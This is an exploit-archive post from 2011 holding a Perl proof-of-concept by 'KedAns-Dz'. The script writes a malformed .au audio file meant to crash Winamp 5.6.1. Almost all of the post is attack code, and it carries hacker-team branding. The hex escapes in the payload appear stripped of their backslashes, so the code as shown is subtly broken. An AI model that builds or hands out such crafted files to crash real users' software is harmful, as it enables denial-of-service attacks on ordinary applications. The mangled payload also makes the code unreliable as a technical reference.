Home / exploits Winamp 5.6.1 Denial Of Service
Posted on 14 April 2011
#!/usr/bin/perl # --------- # Winamp <=5.6.1 (.au) Denial of Service Exploit # Author : KedAns-Dz <ked-h@hotmail.com || ked-h@exploit-id.com> # special thanks to : jos_ali_joe (exploit-id.com) , and All exploit-id Team # --------- # Tested in Windows XP sp3 Fr # Creating The Bad File .AU And Opening ... # The Winamp 5.6.1 is Run With Process (igfxsrvc.exe) and Overflow/Blocked !! my $AU = "x2Ex73x6Ex64x00x00x01x18x00x00x42xDCx00x00x00x01". "x00x00x1Fx40x00x00x00x00x69x61x70x65x74x75x73x2E". "x61x75x00x20x22x69x61x70x65x74x75x73x2Ex61x75x22". "x00x31x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x66x66x66x00"; open (FILE,">> KedAns.au"); # Bad File Here print FILE $AU; close (FILE); # KedAns-Dz | [D] HaCkerS-StreeT-Team [Z] |!| http://twitter.com/kedans
